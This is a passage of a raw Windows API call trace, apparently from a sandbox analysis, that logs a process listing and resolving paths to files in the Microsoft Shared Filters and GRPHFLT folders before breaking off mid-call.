0x36 [0042.153] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0042.153] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0042.153] CoTaskMemFree (pv=0x4fe370) [0042.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0042.153] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters", lpFilePart=0x0) returned 0x36 [0042.153] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0042.153] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters", lpFilePart=0x0) returned 0x36 [0042.154] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", nBufferLength=0x105, lpBuffer=0x2aecc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", lpFilePart=0x0) returned 0x37 [0042.154] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.304] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.304] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x9770, dwReserved0=0x0, dwReserved1=0x0, cFileName="msgfilt.dll", cAlternateFileName="")) returned 1 [0042.304] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x6b29d7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x140790, dwReserved0=0x0, dwReserved1=0x0, cFileName="odffilt.dll", cAlternateFileName="")) returned 1 [0042.304] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x16af90, dwReserved0=0x0, dwReserved1=0x0, cFileName="offfiltx.dll", cAlternateFileName="")) returned 1 [0042.304] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46d35b00, ftCreationTime.dwHighDateTime=0x1cba077, ftLastAccessTime.dwLowDateTime=0xd9e40080, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x46d35b00, ftLastWriteTime.dwHighDateTime=0x1cba077, nFileSizeHigh=0x0, nFileSizeLow=0x206b78, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISFILT.DLL", cAlternateFileName="")) returned 1 [0042.304] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0042.305] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0042.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0042.305] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll", lpFilePart=0x0) returned 0x42 [0042.305] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll", lpFilePart=0x0) returned 0x42 [0042.305] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll", lpFilePart=0x0) returned 0x43 [0042.305] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL", lpFilePart=0x0) returned 0x42 [0042.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0042.305] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters", lpFilePart=0x0) returned 0x36 [0042.305] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", nBufferLength=0x105, lpBuffer=0x2aecc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\", lpFilePart=0x0) returned 0x37 [0042.305] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.306] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.306] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x9770, dwReserved0=0x0, dwReserved1=0x0, cFileName="msgfilt.dll", cAlternateFileName="")) returned 1 [0042.306] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x6b29d7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x140790, dwReserved0=0x0, dwReserved1=0x0, cFileName="odffilt.dll", cAlternateFileName="")) returned 1 [0042.306] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x16af90, dwReserved0=0x0, dwReserved1=0x0, cFileName="offfiltx.dll", cAlternateFileName="")) returned 1 [0042.306] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46d35b00, ftCreationTime.dwHighDateTime=0x1cba077, ftLastAccessTime.dwLowDateTime=0xd9e40080, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x46d35b00, ftLastWriteTime.dwHighDateTime=0x1cba077, nFileSizeHigh=0x0, nFileSizeLow=0x206b78, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISFILT.DLL", cAlternateFileName="")) returned 1 [0042.306] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46d35b00, ftCreationTime.dwHighDateTime=0x1cba077, ftLastAccessTime.dwLowDateTime=0xd9e40080, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x46d35b00, ftLastWriteTime.dwHighDateTime=0x1cba077, nFileSizeHigh=0x0, nFileSizeLow=0x206b78, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISFILT.DLL", cAlternateFileName="")) returned 0 [0042.306] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0042.306] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0042.307] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\.", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT", lpFilePart=0x0) returned 0x36 [0042.307] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0042.307] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0042.307] CoTaskMemFree (pv=0x4fe370) [0042.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0042.307] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT", nBufferLength=0x105, lpBuffer=0x2aed24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT", lpFilePart=0x0) returned 0x36 [0042.307] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0042.307] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT", lpFilePart=0x0) returned 0x36 [0042.307] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", nBufferLength=0x105, lpBuffer=0x2aecc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", lpFilePart=0x0) returned 0x37 [0042.307] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.363] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.363] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x1a9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.CFG", cAlternateFileName="")) returned 1 [0042.363] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfda4ec00, ftCreationTime.dwHighDateTime=0x1cba021, ftLastAccessTime.dwLowDateTime=0xc22488c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xfda4ec00, ftLastWriteTime.dwHighDateTime=0x1cba021, nFileSizeHigh=0x0, nFileSizeLow=0x4f160, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.FLT", cAlternateFileName="")) returned 1 [0042.363] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x93f6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.FNT", cAlternateFileName="")) returned 1 [0042.364] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0xadf90, dwReserved0=0x0, dwReserved1=0x0, cFileName="EPSIMP32.FLT", cAlternateFileName="")) returned 1 [0042.364] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeedd0ad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0x4e380, dwReserved0=0x0, dwReserved1=0x0, cFileName="GIFIMP32.FLT", cAlternateFileName="")) returned 1 [0042.364] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0x3ad80, dwReserved0=0x0, dwReserved1=0x0, cFileName="JPEGIM32.FLT", cAlternateFileName="")) returned 1 [0042.364] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x774, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.CGM", cAlternateFileName="")) returned 1 [0042.364] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x3adb, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.EPS", cAlternateFileName="")) returned 1 [0042.364] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x42d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.GIF", cAlternateFileName="")) returned 1 [0042.364] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x425, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.JPG", cAlternateFileName="")) returned 1 [0042.364] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x692, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.PNG", cAlternateFileName="")) returned 1 [0042.364] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x566, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.WPG", cAlternateFileName="")) returned 1 [0042.365] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeefe5e10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0x11d78, dwReserved0=0x0, dwReserved1=0x0, cFileName="PICTIM32.FLT", cAlternateFileName="")) returned 1 [0042.365] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeefe5e10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0x49f80, dwReserved0=0x0, dwReserved1=0x0, cFileName="PNG32.FLT", cAlternateFileName="")) returned 1 [0042.365] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd53d4900, ftCreationTime.dwHighDateTime=0x1cb7002, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd53d4900, ftLastWriteTime.dwHighDateTime=0x1cb7002, nFileSizeHigh=0x0, nFileSizeLow=0x44780, dwReserved0=0x0, dwReserved1=0x0, cFileName="WPGIMP32.FLT", cAlternateFileName="")) returned 1 [0042.365] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0042.365] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.366] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0042.366] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0042.366] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", lpFilePart=0x0) returned 0x43 [0042.366] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT", lpFilePart=0x0) returned 0x43 [0042.366] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT", lpFilePart=0x0) returned 0x43 [0042.366] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT", lpFilePart=0x0) returned 0x43 [0042.366] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT", lpFilePart=0x0) returned 0x43 [0042.366] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT", lpFilePart=0x0) returned 0x43 [0042.366] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", lpFilePart=0x0) returned 0x3d [0042.366] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", lpFilePart=0x0) returned 0x3d [0042.366] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM", lpFilePart=0x0) returned 0x3d [0042.367] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0042.367] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft 